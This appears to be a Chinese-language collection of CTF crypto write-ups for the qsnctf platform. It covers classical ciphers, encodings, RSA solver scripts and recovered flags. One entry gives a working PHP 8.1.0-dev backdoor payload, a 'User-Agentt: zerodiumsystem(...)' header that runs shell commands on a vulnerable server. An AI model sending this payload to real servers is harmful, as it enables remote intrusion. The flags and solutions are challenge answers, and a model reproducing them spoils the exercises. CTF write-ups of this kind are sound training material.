青少年CTF Crypto 合集

一起下棋

棋盘密码

https://www.qqxiuzi.cn/bianma/qipanmima.php

​

​

basic rsa

import gmpy2
from Crypto.Util.number import *
from binascii import a2b_hex,b2a_hex
flag = "*****************"
p = 262248800182277040650192055439906580479
q = 262854994239322828547925595487519915551
e = 65533
n = p*q
c = pow(int(b2a_hex(flag),16),e,n)
print c
# 27565231154623519221597938803435789010285480123476977081867877272451638645710

​

CheckIn

密文：dikqTCpfRjA8fUBIMD5GNDkwMjNARkUwI0BFTg==
base64解：v)L_F0<}@H0>F49023@FE0#@EN
https://tool.jisuapi.com/base64.html
rot47解：GXY{Y0u_kNow_much_about_Rot}
https://www.jisuan.mobi/puu3uummu313myXP.html

Keyboard

ooo yyy ii w uuu ee iii ee uuu ooo r yyy yyy e

提示是键盘，然后发现这些字母是26键盘的第一行，上面有对应数字，并且位数在1到4位，说明是九键键盘，刚好和题目
意思对上了，这种题写法就是比如o,对应9，就在九键键盘上9的位置，看o有多少位，3位的话，就是9那个位置字符串的
第三个字符。

python脚本
cipher="ooo yyy ii w uuu ee iii ee uuu ooo r yyy yyy e"
base=" qwertyuiop"
a=[" "," ","abc","def","ghi","jkl","mno","pqrs","tuv","wxyz"]
for part in cipher.split(" "):
    s=base.index(part[0])
    count=len(part)
    print(a[s][count-1],end="")

Morse

-..../-..../-..../-.-./-..../.----/-..../--.../--.../-.../....-/-../-..../..-./--.../..---/--.../...--/-..../...../...../..-./--.../...--/-..../..-./...../..-./-..../...../-..../.----/--.../...--/--.../----./...../..-./...--/..---/...--/-----/...--/..---/...--/..---/--.../-..

将/替换成空格

-.... -.... -.... -.-. -.... .---- -.... --... --... -... ....- -.. -.... ..-. --... ..--- --... ...-- -.... ..... ..... ..-. --... ...-- -.... ..-. ..... ..-. -.... ..... -.... .---- --... ...-- --... ----. ..... ..-. ...-- ..--- ...-- ----- ...-- ..--- ...-- ..--- --... -..

摩斯电码解码

666C61677B4D6F7273655F736F5F656173795F323032327D

十六进制转字符串

flag{Morse_so_easy_2022}

BASE

4c4a575851324332474e324753574b594a5a574651365346474a4d4855544c5a4c423546534d444249355547365a5352485536513d3d3d3d

十六进制转字符串

LJWXQ2C2GN2GSWKYJZWFQ6SFGJMHUTLZLB5FSMDBI5UG6ZSRHU6Q====

base32解码

ZmxhZ3tiYXNlXzE2XzMyXzY0aGhofQ==

base64解码

flag{base_16_32_64hhh}

PHP的后门

https://blog.csdn.net/m0_63253040/article/details/127037026

PHP/8.1.0-dev 后门命令执行漏洞复现

bp抓包请求头添加：User-Agentt:zerodiumvar_dump(2*3);

getflag:User-Agentt:zerodiumsystem(“cat /flag”);

​

emoji

👟👫👝🐯👭👫👝🐺👁👫🐰👎👭👫👝🐧🐽👫👝🐯👭
👫👝🐺👁👬🐰🐧🐼👫👅🐯🐸👫👜👨👏👫👄👂👞👫
🐰👰👍👬🐯👰👆👫👫🐾👣👬🐭👊👜👫👜👨👏🐁👟
👫👄👂👞👬🐰🐧🐼👫👅🐯🐸👫👝🐯👭👫👝🐺👁👫
👫🐾👣👬🐭👊👜👫👜👨👏👫👄👂👞👫👜👨👏👫👄
👂👞👫👝🐯👭👫👝🐺👁👫👅👆🐩👫👄👰🐰🐁👟👫
👬👨🐮👫👇👘👥👫👫🐾👣👬🐭👊👜👬🐰🐧🐼👫👅
🐯🐸👫👝🐯👭👫👝🐺👁👫👛👎🐺👫👛👆🐬👫👝🐯
👭👫👝🐺👁👫🐰👎👆👫👛👂👞👫👝🐯👭🐁👟👫👝
🐺👁👫👇👤👬👫👆👰🐸👫👝🐯👭👫👝🐺👁👫👫🐾
👣👬🐭👊👜👫👜👨👏👫👄👂👞👫🐰👰👍👬🐯👰👆
👫👬👨🐮👫👇👘👥👫👬👨🐮👫👇👘👥🐁👟👫🐰👰
👍👬🐯👰👆👫👬👨🐮👫👇👘👥👫👜👨👏👫👄👂👞
👫🐰👎👆👫👛👂👞👫👝🐯👭👫👝🐺👁👬🐰🐧🐼👫
👅🐯🐸👫👬👨🐮👫👇👘👥👫👅👆🐩🐁👟👫👄👰🐰
👫🐰👎👆👫👛👂👞👫👜👨👏👫👄👂👞👫👝🐯👭👫
👝🐺👁👫👜👨👏👫👄👂👞👫🐰👰👍👬🐯👰👆👫👬
👨🐮👫👇👘👥👫👜👨👏👫👄👂👞🐁👜👫👅👆🐩👫
👄👰🐰👫🐰👎👆👫👛👂👞👫👜👨👏👫👄👂👞👫👫
🐾👣👬🐭👊👜👫👝🐯👭👫👝🐺👁👫🐰👰👍👬🐯👰
👆👬🐰🐧🐼👫👅🐯🐸

emoji解码

http://www.atoolbox.net/Tool.php?Id=937

htf8vtfCJt9Wvtf0Ftf8vtfCJu90EtN8AteqXtMKgt9yVu8yOttGlu6SeteqX
htMKgu90EtN8Atf8vtfCJttGlu6SeteqXtMKgteqXtMKgtf8vtfCJtNO2tMy9
htuq7tPanttGlu6Seu90EtN8Atf8vtfCJtdWCtdO5tf8vtfCJt9WOtdKgtf8v
htfCJtPmutOyAtf8vtfCJttGlu6SeteqXtMKgt9yVu8yOtuq7tPantuq7tPan
ht9yVu8yOtuq7tPanteqXtMKgt9WOtdKgtf8vtfCJu90EtN8Atuq7tPantNO2
htMy9t9WOtdKgteqXtMKgtf8vtfCJteqXtMKgt9yVu8yOtuq7tPanteqXtMKg
etNO2tMy9t9WOtdKgteqXtMKgttGlu6Setf8vtfCJt9yVu8yOu90EtN8A

xxcode解码

http://www.atoolbox.net/Tool.php?Id=780

治法主民治法谐和正公信诚由自正公谐和治法由自正公正公治法善友等平由自谐和治法明文治法业敬治法强富治法由自正公信诚等平等平信诚等平正公业敬治法谐和等平善友业敬正公治法正公信诚等平正公善友业敬正公由自治法信诚谐和

社会主义核心价值观解密

http://www.atoolbox.net/Tool.php?Id=850

qsnctf{Crypto_is_good}

Some Word

bubble解码word.txt

http://www.hiencode.com/bubble.html

火狐浏览器控制台解码

​

Brainfuck解码

https://www.splitbrain.org/services/ook

qsnctf{886b2e6f-4c71-4c15-bce1-8085ed83a22b}

ABBB

密文：classicCrypto.txt

将A改为-后将B改为. 摩斯电码解码

​

单表替换密码：http://quipqiup.com/

​

换成小写加上flag包提交

flag：flag{1d817f23-4e20-9405-bf6d-e83d055316d6}

UUID

密文：FvLFArGp[ovpxBpsssD]qCElwwoClsoColwpuvlqFv

栏杆解密：https://www.qqxiuzi.cn/bianma/zhalanmima.php

​

CyberCher的“ROT47 Brute Force”可以看到在rot32处可以看到flag{，rot31处可以看到uuid格式

​

再将rot31的数字部分与rot32的非字母部分对应位置替换

Amount = 31: ek`fz7914c2bd-880b-40b0-8167-2e77e3101a44|

Amount = 32: flag{8:25d3ce.991c.51c1.9278.3f88f4212b55}

得到flag：flag{7914d2ce-880c-40c0-8167-2f77f3101b44}

Uncle Sam

题目

from Crypto.Util.number import *

def generkey(k):
	p, q = getPrime(k), getPrime(k)
	pubkey = p**2 * q
	n = pubkey
	l = (p-1)*(q-1) / gcd(p-1, q-1)
	privkey = inverse(n, l)
	return pubkey, privkey

def encrypt(m, pubkey):
	return pow(bytes_to_long(m), pubkey, pubkey)


# pubkey =  2188967977749378274223515689363599801320698247938997135947965550196681836543275429767581633044354412195352229175764784503562989045268075431206876726265968368605210824232207290410773979606662689866265612797103853982014198455433380266671856355564273196151136025319624636805659505233975208570409914054916955097594873702395812044506205943671404203774360656553350987491558491176962018842708476009578127303566834534914605109859995649555122751891647040448980718882755855420324482466559223748065037520788159654436293431470164057490350841209872489538460060216015196875136927502162027562546316560342464968237957692873588796640619530455268367136243313422579857823529592167101260779382665832380054690727358197646512896661216090677033395209196007249594394515130315041760988292009930675192749010228592156047159029095406021812884258810889225617544404799863903982758961208187042972047819358256866346758337277473016068375206319837317222523597
# privkey = 1430375790065574721602196196929651174572674429040725535698217207301881161695296519567051246290199551982286327831985649037584885137134580625982555634409225551121712376849579015320947279716204424716566222721338735256648873164510429206991141648646869378141312253135997851908862030990576004173514556541317395106924370019574216894560447817319669690140544728277302043783163888037836675290468320723215759693903569878293475447370766682477726453262771004872749335257953507469109966448126634101604029506006038527612917418016783711729800719387298398848370079742790126047329182349899824258355003200173612567191747851669220766603
# enc = 1491421391364871767357931639710394622399451019824572362288458431186299231664459957755422474433520889084351841298056066100216440853409346006657723086501921816381226292526490195810903459483318275931326433052468863850690793659405367902593999395060606972100169925074005992478583035226026829214443008941631771292291305226470216430735050944285543542354459162474346521327649934512511202470099020668235115245819634762067338432916012664452035696422865651002305445711778476072004708256200872226475346448360491248823843688268126341094612981308791499434770936360676087490303951728563482686307164877000300082742316368597958297217061375140696272398140310043942637287763946305961019518639745426370821124559939597559475362769382796386720030343305889701616194279058139516811941262747298761646317383112470923295543635754747288259324745583689440061956478083777663996487389553238481759103908588004219390662578446313004404784835263543083088327198

exp

from gmpy2 import*
from libnum import*N =  2188967977749378274223515689363599801320698247938997135947965550196681836543275429767581633044354412195352229175764784503562989045268075431206876726265968368605210824232207290410773979606662689866265612797103853982014198455433380266671856355564273196151136025319624636805659505233975208570409914054916955097594873702395812044506205943671404203774360656553350987491558491176962018842708476009578127303566834534914605109859995649555122751891647040448980718882755855420324482466559223748065037520788159654436293431470164057490350841209872489538460060216015196875136927502162027562546316560342464968237957692873588796640619530455268367136243313422579857823529592167101260779382665832380054690727358197646512896661216090677033395209196007249594394515130315041760988292009930675192749010228592156047159029095406021812884258810889225617544404799863903982758961208187042972047819358256866346758337277473016068375206319837317222523597
#N = p^2*q
d = 1430375790065574721602196196929651174572674429040725535698217207301881161695296519567051246290199551982286327831985649037584885137134580625982555634409225551121712376849579015320947279716204424716566222721338735256648873164510429206991141648646869378141312253135997851908862030990576004173514556541317395106924370019574216894560447817319669690140544728277302043783163888037836675290468320723215759693903569878293475447370766682477726453262771004872749335257953507469109966448126634101604029506006038527612917418016783711729800719387298398848370079742790126047329182349899824258355003200173612567191747851669220766603
c = 1491421391364871767357931639710394622399451019824572362288458431186299231664459957755422474433520889084351841298056066100216440853409346006657723086501921816381226292526490195810903459483318275931326433052468863850690793659405367902593999395060606972100169925074005992478583035226026829214443008941631771292291305226470216430735050944285543542354459162474346521327649934512511202470099020668235115245819634762067338432916012664452035696422865651002305445711778476072004708256200872226475346448360491248823843688268126341094612981308791499434770936360676087490303951728563482686307164877000300082742316368597958297217061375140696272398140310043942637287763946305961019518639745426370821124559939597559475362769382796386720030343305889701616194279058139516811941262747298761646317383112470923295543635754747288259324745583689440061956478083777663996487389553238481759103908588004219390662578446313004404784835263543083088327198
pq = gcd(pow(2,d*N,N)-2,N)
m = pow(c,d,pq)
print(n2s(m))

single

encode.cpp

#include <bits/stdc++.h>
using namespace std;
int main()
{
	freopen("Plain.txt","r",stdin);
	freopen("Cipher.txt","w",stdout);
	map<char, char> f;
	int arr[26];
	for(int i=0;i<26;++i){
		arr[i]=i;
	}
	random_shuffle(arr,arr+26);
	for(int i=0;i<26;++i){
		f['a'+i]='a'+arr[i];
		f['A'+i]='A'+arr[i];
	}
	char ch;
	while((ch=getchar())!=EOF){
		if(f.count(ch)){
			putchar(f[ch]);
		}else{
			putchar(ch);
		}
	}
	return 0;
}
 

Cipher.txt

Jmqrida rva Lfmz (JRL) eu m uqajemf seny xl enlxdomrexn uajiderc jxoqarerexnu. Rvada mda rvdaa jxooxn rcqau xl JRLu: Paxqmdyc, Mrrmjs-Yalanja mny oekay.
 
Paxqmdyc-urcfa JRLu vmu m jxiqfa xl giaurexnu (rmusu) en dmnza xl jmrazxdeau. Lxd akmoqfa, Wab, Lxdanuej, Jdcqrx, Benmdc xd uxoarvenz afua. Ramo jmn zmen uxoa qxenru lxd atadc uxftay rmus. Oxda qxenru lxd oxda jxoqfejmray rmusu iuimffc. Rva nakr rmus en jvmen jmn ba xqanay xnfc mlrad uxoa ramo uxfta qdatexiu rmus. Rvan rva zmoa reoa eu xtad uio xl qxenru uvxwu cxi m JRL wenad. Lmoxiu akmoqfa xl uijv JRL eu Yaljxn JRL gimfu.
 
Waff, mrrmjs-yalanja eu mnxrvad enradaurenz seny xl jxoqarerexnu. Vada atadc ramo vmu xwn narwxds(xd xnfc xna vxur) werv tifnmdmbfa uadtejau. Cxid ramo vmu reoa lxd qmrjvenz cxid uadtejau mny yatafxqenz akqfxeru iuimffc. Ux, rvan xdzmnehadu jxnnajru qmdrejeqmnru xl jxoqarerexn mny rva wmdzmoa urmdru! Cxi uvxify qdxrajr xwn uadtejau lxd yalanja qxenru mny vmjs xqqxnanru lxd mrrmjs qxenru. Veurxdejmffc rveu eu m ledur rcqa xl JRLu, atadcbxyc snxwu mbxir YAL JXN JRL - uxoarvenz fesa m Wxdfy Jiq xl mff xrvad jxoqarerexnu.
 
Oekay jxoqarerexnu omc tmdc qxuuebfa lxdomru. Er omc ba uxoarvenz fesa wmdzmoa werv uqajemf reoa lxd rmus-bmuay afaoanru (a.z. IJUB eJRL).
 
JRL zmoau xlran rxijv xn omnc xrvad muqajru xl enlxdomrexn uajiderc: jdcqrxzdmqvc, urazx, benmdc mnmfcueu, datadua anzanaadenz, oxbefa uajiderc mny xrvadu. Zxxy ramou zanadmffc vmta urdxnz useffu mny akqadeanja en mff rvaua euuiau.
 
Iuimffc, lfmz eu uxoa urdenz xl dmnyxo ymrm xd rakr en uxoa lxdomr. Akmoqfa mljrl{Xv_I_lxiny_er_neja_rDc}

分析确认无规律替换加密

修改一下原来的代码，反向替换一下即可（注意 输出文件和输入文件要对调一下）

decode.cpp

#include <bits/stdc++.h>
using namespace std;
int main()
{
	freopen("Cipher.txt","r",stdin);//输入输出换一下
	freopen("Plain.txt","w",stdout);//输入输出换一下
	map<char, char> f;
	int arr[26];
	for(int i=0;i<26;++i){
		arr[i]=i;
	}
	random_shuffle(arr,arr+26);
	for(int i=0;i<26;++i){
		f['a'+i]='a'+arr[i];
		f['A'+i]='A'+arr[i];
	}
	char ch;
	while((ch=getchar())!=EOF){
		if(f.count(ch)){
            //反向转换一下，通过value>>key
			for(map<char,char>::iterator it = f.begin();it!=f.end();it++)
			{
				if(it->second == ch)
				{
				  putchar(it->first);
				  break;
				}
			}
		}else{
			putchar(ch);
		}
	}
	return 0;
}

执行后结果：

Capture the Flag (CTF) is a special kind of information security competitions. There are three common types of CTFs: Jeopardy, Attack-Defence and mixed.
 
Jeopardy-style CTFs has a couple of questions (tasks) in range of categories. For example, Web, Forensic, Crypto, Binary or something else. Team can gain some points for every solved task. More points for more complicated tasks usually. The next task in chain can be opened only after some team solve previous task. Then the game time is over sum of points shows you a CTF winer. Famous example of such CTF is Defcon CTF quals.
 
Well, attack-defence is another interesting kind of competitions. Here every team has own network(or only one host) with vulnarable services. Your team has time for patching your services and developing exploits usually. So, then organizers connects participants of competition and the wargame starts! You should protect own services for defence points and hack opponents for attack points. Historically this is a first type of CTFs, everybody knows about DEF CON CTF - something like a World Cup of all other competitions.
 
Mixed competitions may vary possible formats. It may be something like wargame with special time for task-based elements (e.g. UCSB iCTF).
 
CTF games often touch on many other aspects of information security: cryptography, stego, binary analysis, reverse engeneering, mobile security and others. Good teams generally have strong skills and experience in all these issues.
 
Usually, flag is some string of random data or text in some format. Example afctf{Oh_U_found_it_nice_tRy}

flag在末尾

花开藏宝地

[qsnctf 花开藏宝地 ] - Kicky_Mu - 博客园 (cnblogs.com)

‍